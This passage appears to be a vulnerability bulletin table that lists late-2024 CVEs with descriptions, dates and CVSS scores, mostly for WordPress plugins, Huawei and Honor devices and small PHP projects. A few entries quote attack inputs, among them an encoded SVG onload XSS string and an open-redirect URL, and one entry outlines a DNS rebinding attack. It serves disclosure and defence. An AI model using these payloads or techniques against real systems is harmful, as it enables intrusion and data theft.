IBM AIX 7.2, 7.3, VIOS 3.1, and 4.1 could allow a non-privileged local user to exploit a vulnerability in the TCP/IP kernel extension to cause a denial of service. | 2024-12-25 | 5.5 | CVE-2024-52906 |
| n/a -- n/a |
A race condition vulnerability in SimplCommerce at commit 230310c8d7a0408569b292c5a805c459d47a1d8f allows attackers to bypass inventory restrictions by simultaneously submitting purchase requests from multiple accounts for the same product. This can lead to overselling when stock is limited, as the system fails to accurately track inventory under high concurrency, resulting in potential loss and unfulfilled orders. | 2024-12-27 | 5.9 | CVE-2024-53476 |
| n/a -- n/a |
SimpleXLSX is software for parsing and retrieving data from Excel XLSx files. Starting in 1.0.12 and ending in 1.1.13, when calling the extended toHTMLEx method, it is possible to execute arbitrary JavaScript code. This vulnerability is fixed in 1.1.13. | 2024-12-23 | 5.4 | CVE-2024-56364 |
| n/a -- n/a |
@marp-team/marp-core is the core for Marp, which is the ecosystem to write your presentation with plain Markdown. Marp Core from v3.0.2 to v3.9.0 and v4.0.0, are vulnerable to cross-site scripting (XSS) due to improper neutralization of HTML sanitization. Marp Core v3.9.1 and v4.0.1 have been patched to fix that. If you are unable to update the package immediately, disable all HTML tags by setting html: false option in the Marp class constructor. | 2024-12-26 | 5.3 | CVE-2024-56510 |
| n/a -- n/a |
A vulnerability in Koji was found. An unsanitized input allows for an XSS attack. Javascript code from a malicious link could be reflected in the resulting web page. It is not expected to be able to submit an action or make a change in Koji due to existing XSS protections in the code | 2024-12-24 | 5.4 | CVE-2024-9427 |
| n/a -- n/a |
The NEX-Forms - Ultimate Form Builder - Contact forms and much more plugin for WordPress is vulnerable to SQL Injection via the 'search_params' parameter in all versions up to, and including, 8.7.13 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This can be exploited via CSRF due to a lack of nonce validation on the get_table_records AJAX action. | 2024-12-25 | 4.9 | CVE-2024-10862 |
| n/a -- n/a |
The wp-publications WordPress plugin through 1.2 does not escape filenames before outputting them back in the page, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-12-27 | 4.8 | CVE-2024-11605 |
| n/a -- n/a |
The float block WordPress plugin through 1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-12-27 | 4.8 | CVE-2024-11645 |
| n/a -- n/a |
The DN Shipping by Weight for WooCommerce WordPress plugin before 1.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack | 2024-12-27 | 4.3 | CVE-2024-11842 |
| n/a -- n/a |
The GiveWP WordPress plugin before 3.19.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2024-12-27 | 4.8 | CVE-2024-11921 |
| n/a -- n/a |
The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the bitform-form-entry-edit endpoint in all versions up to, and including, 2.17.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view all form submissions from other users. | 2024-12-25 | 4.3 | CVE-2024-12190 |
| n/a -- n/a |
The Print Invoice & Delivery Notes for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wcdn_remove_shoplogo' AJAX action in all versions up to, and including, 5.4.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to remove the shop's logo. | 2024-12-24 | 4.3 | CVE-2024-12210 |
| n/a -- n/a |
The Avada (Fusion) Builder plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 3.11.12 via the handle_clone_post() function and the 'fusion_blog' shortcode and due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to. | 2024-12-25 | 4.3 | CVE-2024-12335 |
| n/a -- n/a |
The Privacy Policy Generator, Terms & Conditions Generator WordPress Plugin : WP Legal Pages plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.6. This is due to missing or incorrect nonce validation on the 'create_popup_delete_process' function. This makes it possible for unauthenticated attackers to delete popups via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-25 | 4.3 | CVE-2024-12636 |
| n/a -- n/a |
The Database Backup and check Tables Automated With Scheduler 2024 plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.32 via the database_backup_ajax_download() function. This makes it possible for authenticated attackers, with administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. | 2024-12-24 | 4.9 | CVE-2024-12850 |
| n/a -- n/a |
A vulnerability has been found in PHPGurukul Blood Bank & Donor Management System 2.4 and classified as problematic. This vulnerability affects unknown code of the file /logout.php. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-26 | 4.3 | CVE-2024-12955 |
| n/a -- n/a |
A vulnerability was found in code-projects Job Recruitment 1.0 and classified as problematic. This issue affects the function cn_update of the file /_parse/_all_edits.php. The manipulation of the argument cname leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-12-27 | 4.3 | CVE-2024-12979 |
| n/a -- n/a |
A vulnerability was found in code-projects Job Recruitment 1.0. It has been classified as problematic. Affected is the function fln_update of the file /_parse/_all_edits.php. The manipulation of the argument fname/lname leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-27 | 4.3 | CVE-2024-12980 |
| n/a -- n/a |
A vulnerability was found in ruifang-tech Rebuild 3.8.6. It has been classified as problematic. This affects an unknown part of the file /user/admin-verify of the component Admin Verification Page. The manipulation of the argument nexturl with the input http://localhost/evil.html leads to open redirect. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-27 | 4.3 | CVE-2024-12990 |
| n/a -- n/a |
A vulnerability, which was classified as problematic, was found in code-projects Online Car Rental System 1.0. This affects an unknown part of the file /index.php of the component GET Parameter Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-28 | 4.3 | CVE-2024-12998 |
| n/a -- n/a |
OpenCTI is an open-source cyber threat intelligence platform. Before 6.3.0, general users can access information that can only be accessed by users with access privileges to admin and support information (SETTINGS_SUPPORT). This is due to inadequate access control for support information (http://<opencti_domain>/storage/get/support/UUID/UUID.zip), and that the UUID is available to general users using an attached query (logs query). This vulnerability is fixed in 6.3.0. | 2024-12-26 | 4.3 | CVE-2024-45805 |
| n/a -- n/a |
Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions. | 2024-12-26 | 4 | CVE-2024-47148 |
| n/a -- n/a |
Home-Gallery.org is a self-hosted open-source web gallery to browse personal photos and videos. In 1.15.0 and earlier, the default setup of home-gallery is vulnerable to DNS rebinding. Home-gallery is set up without TLS and user authentication by default, leaving it vulnerable to DNS rebinding. In this attack, an attacker will ask a user to visit their website. The attacker website will then change the DNS records of their domain from their IP address to the internal IP address of the home-gallery instance. To tell which IP addresses are valid, we can rebind a subdomain to each IP address we want to check, and see if there is a response. Once potential candidates have been found, the attacker can launch the attack by reading the response of the web server after the IP address has changed. When the attacker domain is fetched, the response will be from the home-gallery instance, not the attacker website, because the IP address has been changed. Due to a lack of authentication, home-gallery photos can then be extracted by the attacker website. | 2024-12-23 | 4.3 | CVE-2024-53275 |
| n/a -- n/a |
A cross-site scripting (XSS) vulnerability in the graphicCustomization.do page in Kurmi Provisioning Suite before 7.9.0.38, 7.10.x through 7.10.0.18, and 7.11.x through 7.11.0.15 allows remote attackers (authenticated as system administrators) to inject arbitrary web script or HTML via the COMPONENT_fields(htmlTitle) field, which is rendered in other pages of the application for all users (if the graphical customization has been activated by a super-administrator). | 2024-12-27 | 4.8 | CVE-2024-54451 |
| n/a -- n/a |
An issue was discovered in Kurmi Provisioning Suite before 7.9.0.35 and 7.10.x through 7.10.0.18. A Directory Traversal and Local File Inclusion vulnerability in the logsSys.do page allows remote attackers (authenticated as administrators) to trigger the display of unintended files. Any file accessible to the Kurmi user account could be displayed, e.g., configuration files with information such as the database password. | 2024-12-27 | 4.9 | CVE-2024-54452 |
| n/a -- n/a |
Dcat Admin v2.2.0-beta contains a cross-site scripting (XSS) vulnerability in /admin/articles/create. | 2024-12-27 | 4.8 | CVE-2024-54774 |
| n/a -- n/a |
Dcat-Admin v2.2.0-beta and v2.2.2-beta contains a Cross-Site Scripting (XSS) vulnerability via /admin/auth/menu and /admin/auth/extensions. | 2024-12-27 | 4.8 | CVE-2024-54775 |
| n/a -- n/a |
LinkAce is a self-hosted archive to collect links of your favorite websites. Prior to 1.15.6, a reflected cross-site scripting (XSS) vulnerability exists in the LinkAce. This issue occurs in the "URL" field of the "Edit Link" module, where user input is not properly sanitized or encoded before being reflected in the HTML response. This allows attackers to inject and execute arbitrary JavaScript in the context of the victim's browser, leading to potential session hijacking, data theft, and unauthorized actions. This vulnerability is fixed in 1.15.6. | 2024-12-27 | 4.6 | CVE-2024-56507 |
| n/a -- n/a |
Some Honor products are affected by information leak vulnerability, successful exploitation could cause the information leak. | 2024-12-26 | 4 | CVE-2024-8992 |
| n/a--FoxCMS |
A vulnerability classified as critical has been found in FoxCMS up to 1.2. Affected is an unknown function of the file /install/installdb.php of the component Configuration File Handler. The manipulation of the argument database password leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-23 | 6.3 | CVE-2024-12900 |
| n/a--FoxCMS |
A vulnerability classified as critical was found in FoxCMS up to 1.2. Affected by this vulnerability is an unknown functionality of the file /app/api/controller/Site.php of the component API Endpoint. The manipulation of the argument password leads to improper authorization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-23 | 5.3 | CVE-2024-12901 |
| n/a--n/a |
libpoppler.so in Poppler through 24.12.0 has an out-of-bounds read vulnerability within the JBIG2Bitmap::combine function in JBIG2Stream.cc. | 2024-12-23 | 4.3 | CVE-2024-56378 |
| Oracle Corporation--Oracle Linux |
In the linux kernel, if IMA appraisal is used with the "ima_appraise=log" boot param, lockdown can be defeated with kexec on any machine when Secure Boot is disabled or unavailable. IMA prevents setting "ima_appraise=log" from the boot param when Secure Boot is enabled, but this does not cover cases where lockdown is used without Secure Boot. CVSS 3.1 Base Score 6.7 (Confidentiality, Integrity, Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H). | 2024-12-24 | 6.7 | CVE-2022-21505 |
| webuidesigning--NebulaX Theme |
A vulnerability, which was classified as critical, has been found in webuidesigning NebulaX Theme up to 5.0 on WordPress. This issue affects the function nebula_send_to_hubspot of the file libs/Legacy/Legacy.php. The manipulation leads to sql injection. The attack may be initiated remotely. The patch is named 41230a81db0f671c570c2644bc2f80565ca83c5a. It is recommended to apply a patch to fix this issue. | 2024-12-23 | 6.3 | CVE-2018-25106 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| Huawei--HUAWEI Mate 20 |
There is an improper authorization vulnerability in some Huawei smartphones. An attacker could perform a series of operation in specific mode to exploit this vulnerability. Successful exploit could allow the attacker to bypass app lock. (Vulnerability ID: HWPSIRT-2019-12144) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-9081. | 2024-12-27 | 3.5 | CVE-2020-9081 |
| Huawei--HUAWEI Mate 20 |
There is an information disclosure vulnerability in several smartphones. The system has a logic judging error under certain scenario, the attacker should gain the permit to execute commands in ADB mode and then do a series of operation on the phone. Successful exploit could allow the attacker to gain certain information from certain apps locked by Applock. (Vulnerability ID: HWPSIRT-2019-07112) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-9082. | 2024-12-27 | 3.5 | CVE-2020-9082 |
| Huawei--HUAWEI P30 Pro |
There is an information vulnerability in Huawei smartphones. A function in a module can be called without verifying the caller's access. Attackers with user access can exploit this vulnerability to obtain some information. This can lead to information leak. (Vulnerability ID: HWPSIRT-2019-12141) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-9089. | 2024-12-27 | 3.3 | CVE-2020-9089 |
| Huawei--IPS Module |
There are multiple out of bounds (OOB) read vulnerabilities in the implementation of the Common Open Policy Service (COPS) protocol of some Huawei products. The specific decoding function may occur out-of-bounds read when processes an incoming data packet. Successful exploit of these vulnerabilities may disrupt service on the affected device. (Vulnerability ID: HWPSIRT-2018-12275,HWPSIRT-2018-12276,HWPSIRT-2018-12277,HWPSIRT-2018-12278,HWPSIRT-2018-12279,HWPSIRT-2018-12280 and HWPSIRT-2018-12289) The seven vulnerabilities have been assigned seven Common Vulnerabilities and Exposures (CVE) IDs: CVE-2020-1818, CVE-2020-1819, CVE-2020-1820, CVE-2020-1821, CVE-2020-1822, CVE-2020-1823 and CVE-2020-1824. | 2024-12-27 | 3.7 | CVE-2020-1818 |
| Huawei--IPS Module |
There are multiple out of bounds (OOB) read vulnerabilities in the implementation of the Common Open Policy Service (COPS) protocol of some Huawei products. The specific decoding function may occur out-of-bounds read when processes an incoming data packet. Successful exploit of these vulnerabilities may disrupt service on the affected device. (Vulnerability ID: HWPSIRT-2018-12275,HWPSIRT-2018-12276,HWPSIRT-2018-12277,HWPSIRT-2018-12278,HWPSIRT-2018-12279,HWPSIRT-2018-12280 and HWPSIRT-2018-12289) The seven vulnerabilities have been assigned seven Common Vulnerabilities and Exposures (CVE) IDs: CVE-2020-1818, CVE-2020-1819, CVE-2020-1820, CVE-2020-1821, CVE-2020-1822, CVE-2020-1823 and CVE-2020-1824. | 2024-12-27 | 3.7 | CVE-2020-1819 |
| Huawei--IPS Module |
There are multiple out of bounds (OOB) read vulnerabilities in the implementation of the Common Open Policy Service (COPS) protocol of some Huawei products. The specific decoding function may occur out-of-bounds read when processes an incoming data packet. Successful exploit of these vulnerabilities may disrupt service on the affected device. (Vulnerability ID: HWPSIRT-2018-12275,HWPSIRT-2018-12276,HWPSIRT-2018-12277,HWPSIRT-2018-12278,HWPSIRT-2018-12279,HWPSIRT-2018-12280 and HWPSIRT-2018-12289) The seven vulnerabilities have been assigned seven Common Vulnerabilities and Exposures (CVE) IDs: CVE-2020-1818, CVE-2020-1819, CVE-2020-1820, CVE-2020-1821, CVE-2020-1822, CVE-2020-1823 and CVE-2020-1824. | 2024-12-28 | 3.7 | CVE-2020-1820 |
| Huawei--IPS Module |
There are multiple out of bounds (OOB) read vulnerabilities in the implementation of the Common Open Policy Service (COPS) protocol of some Huawei products. The specific decoding function may occur out-of-bounds read when processes an incoming data packet. Successful exploit of these vulnerabilities may disrupt service on the affected device. (Vulnerability ID: HWPSIRT-2018-12275,HWPSIRT-2018-12276,HWPSIRT-2018-12277,HWPSIRT-2018-12278,HWPSIRT-2018-12279,HWPSIRT-2018-12280 and HWPSIRT-2018-12289) The seven vulnerabilities have been assigned seven Common Vulnerabilities and Exposures (CVE) IDs: CVE-2020-1818, CVE-2020-1819, CVE-2020-1820, CVE-2020-1821, CVE-2020-1822, CVE-2020-1823 and CVE-2020-1824. | 2024-12-28 | 3.7 | CVE-2020-1821 |
| Huawei--IPS Module |
There are multiple out of bounds (OOB) read vulnerabilities in the implementation of the Common Open Policy Service (COPS) protocol of some Huawei products. The specific decoding function may occur out-of-bounds read when processes an incoming data packet. Successful exploit of these vulnerabilities may disrupt service on the affected device. (Vulnerability ID: HWPSIRT-2018-12275,HWPSIRT-2018-12276,HWPSIRT-2018-12277,HWPSIRT-2018-12278,HWPSIRT-2018-12279,HWPSIRT-2018-12280 and HWPSIRT-2018-12289) The seven vulnerabilities have been assigned seven Common Vulnerabilities and Exposures (CVE) IDs: CVE-2020-1818, CVE-2020-1819, CVE-2020-1820, CVE-2020-1821, CVE-2020-1822, CVE-2020-1823 and CVE-2020-1824. | 2024-12-28 | 3.7 | CVE-2020-1822 |
| Huawei--IPS Module |
There are multiple out of bounds (OOB) read vulnerabilities in the implementation of the Common Open Policy Service (COPS) protocol of some Huawei products. The specific decoding function may occur out-of-bounds read when processes an incoming data packet. Successful exploit of these vulnerabilities may disrupt service on the affected device. (Vulnerability ID: HWPSIRT-2018-12275,HWPSIRT-2018-12276,HWPSIRT-2018-12277,HWPSIRT-2018-12278,HWPSIRT-2018-12279,HWPSIRT-2018-12280 and HWPSIRT-2018-12289) The seven vulnerabilities have been assigned seven Common Vulnerabilities and Exposures (CVE) IDs: CVE-2020-1818, CVE-2020-1819, CVE-2020-1820, CVE-2020-1821, CVE-2020-1822, CVE-2020-1823 and CVE-2020-1824. | 2024-12-28 | 3.7 | CVE-2020-1823 |
| Huawei--IPS Module |
There are multiple out of bounds (OOB) read vulnerabilities in the implementation of the Common Open Policy Service (COPS) protocol of some Huawei products. The specific decoding function may occur out-of-bounds read when processes an incoming data packet. Successful exploit of these vulnerabilities may disrupt service on the affected device. (Vulnerability ID: HWPSIRT-2018-12275,HWPSIRT-2018-12276,HWPSIRT-2018-12277,HWPSIRT-2018-12278,HWPSIRT-2018-12279,HWPSIRT-2018-12280 and HWPSIRT-2018-12289) The seven vulnerabilities have been assigned seven Common Vulnerabilities and Exposures (CVE) IDs: CVE-2020-1818, CVE-2020-1819, CVE-2020-1820, CVE-2020-1821, CVE-2020-1822, CVE-2020-1823 and CVE-2020-1824. | 2024-12-28 | 3.7 | CVE-2020-1824 |
| n/a -- n/a |
An issue was discovered in GitLab CE/EE affecting all versions before 17.6.0 in which users were unaware that files uploaded to comments on confidential issues and epics of public projects could be accessed without authentication via a direct link to the uploaded file URL. | 2024-12-25 | 3.7 | CVE-2023-5117 |
| n/a -- n/a |
A vulnerability was found in code-projects Simple Admin Panel 1.0 and classified as problematic. This issue affects some unknown processing of the file addCatController.php. The manipulation of the argument c_name leads to cross site scripting. The attack may be initiated remotely. | 2024-12-26 | 3.5 | CVE-2024-12930 |
| n/a -- n/a |
A vulnerability was found in code-projects Simple Admin Panel 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file addSizeController.php. The manipulation of the argument size leads to cross site scripting. The attack can be launched remotely. | 2024-12-26 | 3.5 | CVE-2024-12932 |
| n/a -- n/a |
A vulnerability was found in code-projects Simple Admin Panel 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file updateItemController.php. The manipulation of the argument p_name/p_desc leads to cross site scripting. The attack may be launched remotely. | 2024-12-26 | 3.5 | CVE-2024-12933 |
| n/a -- n/a |
A vulnerability was found in Beijing Longda Jushang Technology DBShop商城系统 3.3 Release 231225. It has been declared as problematic. This vulnerability affects unknown code of the file /home-order. The manipulation of the argument orderStatus with the input %22%3E%3Csvg%20onload=alert(5888)%3E leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-27 | 3.5 | CVE-2024-12991 |
| n/a -- n/a |
A vulnerability classified as problematic has been found in ruifang-tech Rebuild 3.8.6. This affects an unknown part of the file /project/050-9000000000000001/tasks of the component Project Tasks Section. The manipulation of the argument description leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-28 | 3.5 | CVE-2024-12995 |
| n/a -- n/a |
A vulnerability, which was classified as problematic, has been found in code-projects Hostel Management System 1.0. This issue affects some unknown processing of the file /admin/registration.php. The manipulation of the argument fname/mname/lname leads to cross site scripting. The attack may be initiated remotely. | 2024-12-29 | 3.5 | CVE-2024-13012 |
| n/a -- n/a |
A vulnerability classified as problematic has been found in code-projects Chat System 1.0. Affected is an unknown function of the file /admin/update_room.php of the component Chat Room Page. The manipulation of the argument name leads to cross site scripting. It is possible to launch the attack remotely. | 2024-12-29 | 3.5 | CVE-2024-13019 |
| n/a -- n/a |
A vulnerability, which was classified as problematic, has been found in SourceCodester Road Accident Map Marker 1.0. Affected by this issue is some unknown functionality of the file /endpoint/add-mark.php. The manipulation of the argument mark_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-12-29 | 3.5 | CVE-2024-13021 |
| n/a -- n/a |
A vulnerability, which was classified as problematic, has been found in Antabot White-Jotter up to 0.2.2. This issue affects some unknown processing of the file /login. The manipulation of the argument username leads to observable response discrepancy. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. | 2024-12-29 | 3.7 | CVE-2024-13028 |
| n/a -- n/a |
Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions. | 2024-12-26 | 3.3 | CVE-2024-47149 |
| n/a -- n/a |
Some Honor products are affected by information leak vulnerability, successful exploitation could cause the information leak. | 2024-12-26 | 3.3 | CVE-2024-47150 |
| n/a -- n/a |
Some Honor products are affected by information leak vulnerability, successful exploitation could cause the information leak. | 2024-12-26 | 3.3 | CVE-2024-47156 |
| n/a -- n/a |
shadow-utils (aka shadow) 4.4 through 4.17.0 establishes a default /etc/subuid behavior (e.g., uid 100000 through 165535 for the first user account) that can realistically conflict with the uids of users defined on locally administered networks, potentially leading to account takeover, e.g., by leveraging newuidmap for access to an NFS home directory (or same-host resources in the case of remote logins by these local network users). NOTE: it may also be argued that system administrators should not have assigned uids, within local networks, that are within the range that can occur in /etc/subuid. | 2024-12-26 | 3.6 | CVE-2024-56433 |
| n/a -- n/a |
A vulnerability was found in PHPGurukul Blood Bank & Donor Management System 2.4. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /bbdms/admin/update-contactinfo.php. The manipulation of the argument Address leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-27 | 2.4 | CVE-2024-12982 |
| n/a -- n/a |
A vulnerability classified as problematic has been found in code-projects Hospital Management System 1.0. This affects an unknown part of the file /hospital/hms/admin/manage-doctors.php of the component Edit Doctor Details Page. The manipulation of the argument Doctor Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-12-27 | 2.4 | CVE-2024-12983 |
| n/a -- n/a |
A vulnerability, which was classified as problematic, was found in PHPGurukul Maid Hiring Management System 1.0. Affected is an unknown function of the file /admin/contactus.php of the component Contact Us Page. The manipulation of the argument page title leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-29 | 2.4 | CVE-2024-13013 |
| n/a -- n/a |
A vulnerability was found in PHPGurukul Maid Hiring Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/search-booking-request.php. The manipulation of the argument searchdata leads to cross site scripting. The attack may be launched remotely. | 2024-12-29 | 2.4 | CVE-2024-13015 |
| n/a -- n/a |
A vulnerability was found in PHPGurukul Maid Hiring Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/aboutus.php of the component About Us Page. The manipulation of the argument title leads to cross site scripting. The attack can be initiated remotely. | 2024-12-29 | 2.4 | CVE-2024-13017 |
| n/a -- n/a |
A vulnerability was found in PHPGurukul Maid Hiring Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/profile.php. The manipulation of the argument name leads to cross site scripting. The attack may be initiated remotely. | 2024-12-29 | 2.4 | CVE-2024-13018 |
| n/a -- n/a |
A vulnerability has been found in PHPGurukul Maid Hiring Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/search-maid.php of the component Search Maid Page. The manipulation of the argument searchdata leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-29 | 2.4 | CVE-2024-13023 |
| n/a -- n/a |
Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions. | 2024-12-26 | 2.9 | CVE-2024-47157 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: sh: cpuinfo: Fix a warning for CONFIG_CPUMASK_OFFSTACK When CONFIG_CPUMASK_OFFSTACK and CONFIG_DEBUG_PER_CPU_MAPS are selected, cpu_max_bits_warn() generates a runtime warning similar as below when showing /proc/cpuinfo. Fix this by using nr_cpu_ids (the runtime limit) instead of NR_CPUS to iterate CPUs. [ 3.052463] ------------[ cut here ]------------ [ 3.059679] WARNING: CPU: 3 PID: 1 at include/linux/cpumask.h:108 show_cpuinfo+0x5e8/0x5f0 [ 3.070072] Modules linked in: efivarfs autofs4 [ 3.076257] CPU: 0 PID: 1 Comm: systemd Not tainted 5.19-rc5+ #1052 [ 3.099465] Stack : 9000000100157b08 9000000000f18530 9000000000cf846c 9000000100154000 [ 3.109127] 9000000100157a50 0000000000000000 9000000100157a58 9000000000ef7430 [ 3.118774] 90000001001578e8 0000000000000040 0000000000000020 ffffffffffffffff [ 3.128412] 0000000000aaaaaa 1ab25f00eec96a37 900000010021de80 900000000101c890 [ 3.138056] 0000000000000000 0000000000000000 0000000000000000 0000000000aaaaaa [ 3.147711] ffff8000339dc220 0000000000000001 0000000006ab4000 0000000000000000 [ 3.157364] 900000000101c998 0000000000000004 9000000000ef7430 0000000000000000 [ 3.167012] 0000000000000009 000000000000006c 0000000000000000 0000000000000000 [ 3.176641] 9000000000d3de08 9000000001639390 90000000002086d8 00007ffff0080286 [ 3.186260] 00000000000000b0 0000000000000004 0000000000000000 0000000000071c1c [ 3.195868] ... [ 3.199917] Call Trace: [ 3.203941] [<90000000002086d8>] show_stack+0x38/0x14c [ 3.210666] [<9000000000cf846c>] dump_stack_lvl+0x60/0x88 [ 3.217625] [<900000000023d268>] __warn+0xd0/0x100 [ 3.223958] [<9000000000cf3c90>] warn_slowpath_fmt+0x7c/0xcc [ 3.231150] [<9000000000210220>] show_cpuinfo+0x5e8/0x5f0 [ 3.238080] [<90000000004f578c>] seq_read_iter+0x354/0x4b4 [ 3.245098] [<90000000004c2e90>] new_sync_read+0x17c/0x1c4 [ 3.252114] [<90000000004c5174>] vfs_read+0x138/0x1d0 [ 3.258694] [<90000000004c55f8>] ksys_read+0x70/0x100 [ 3.265265] [<9000000000cfde9c>] do_syscall+0x7c/0x94 [ 3.271820] [<9000000000202fe4>] handle_syscall+0xc4/0x160 [ 3.281824] ---[ end trace 8b484262b4b8c24c ]--- | 2024-12-27 | not yet calculated | CVE-2022-49034 |
| n/a -- n/a |
The Broken Link Checker WordPress plugin before 2.4.2 does not validate a the link URLs before making a request to them, which could allow admin users to perform SSRF attack, for example on a multisite installation. | 2024-12-26 | not yet calculated | CVE-2024-10903 |
| n/a -- n/a |
The WPForms WordPress plugin before 1.9.2.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-12-26 | not yet calculated | CVE-2024-11223 |
| n/a -- n/a |
A Improper Control of Generation of Code ('Code Injection') vulnerability in groovy script function in SmartRobot′s Conversational AI Platform before v7.2.0 allows remote authenticated users to perform arbitrary system commands via Groovy code. | 2024-12-26 | not yet calculated | CVE-2024-12652 |
| n/a -- n/a |
In OPPOStore iOS App, there's a possible escalation of privilege due to improper input validation. | 2024-12-25 | not yet calculated | CVE-2024-1609 |
| n/a -- n/a |
A Denial of Service vulnerability in the DNS Security feature of Palo Alto Networks PAN-OS software allows an unauthenticated attacker to send a malicious packet through the data plane of the firewall that reboots the firewall. Repeated attempts to trigger this condition will cause the firewall to enter maintenance mode. | 2024-12-27 | not yet calculated | CVE-2024-3393 |
| n/a -- n/a |
Incorrect access control in the /users endpoint of Cpacker MemGPT v0.3.17 allows attackers to access sensitive data. | 2024-12-27 | not yet calculated | CVE-2024-39025 |
| n/a -- n/a |
Team ENVY, a Security Research TEAM has found a flaw that allows for a remote code execution on the NVR. An attacker can cause a stack overflow by entering large data into URL parameters, which will result in a system reboot. The manufacturer has released patch firmware for the flaw, please refer to the manufacturer's report for details and workarounds. | 2024-12-24 | not yet calculated | CVE-2024-41882 |
| n/a -- n/a |
Team ENVY, a Security Research TEAM has found a flaw that allows for a remote code execution on the NVR . An attacker enters a special value for a specific URL parameter, resulting in a NULL pointer reference and a reboot of the NVR. The manufacturer has released patch firmware for the flaw, please refer to the manufacturer's report for details and workarounds. | 2024-12-24 | not yet calculated | CVE-2024-41883 |
| n/a -- n/a |
Team ENVY, a Security Research TEAM has found a flaw that allows for a remote code execution on the NVR. If an attacker does not enter any value for a specific URL parameter, NULL pointer references will occur and the NVR will reboot. The manufacturer has released patch firmware for the flaw, please refer to the manufacturer's report for details and workarounds. | 2024-12-24 | not yet calculated | CVE-2024-41884 |
| n/a -- n/a |
Team ENVY, a Security Research TEAM has found a flaw that allows for a remote code execution on the NVR. The seed string for the encrypt key was hardcoding. The manufacturer has released patch firmware for the flaw, please refer to the manufacturer's report for details and workarounds. | 2024-12-24 | not yet calculated | CVE-2024-41885 |
| n/a -- n/a |
Team ENVY, a Security Research TEAM has found a flaw that allows for a remote code execution on the NVR. An attacker could inject malformed data into url input parameters to reboot the NVR. The manufacturer has released patch firmware for the flaw, please refer to the manufacturer's report for details and workarounds. | 2024-12-24 | not yet calculated | CVE-2024-41886 |
| n/a -- n/a |
Team ENVY, a Security Research TEAM has found a flaw that allows for a remote code execution on the NVR. An attacker can create an NVR log file in a directory one level higher on the system, which can be used to corrupt files in the directory. The manufacturer has released patch firmware for the flaw, please refer to the manufacturer's report for details and workarounds. | 2024-12-24 | not yet calculated | CVE-2024-41887 |
| n/a -- n/a |
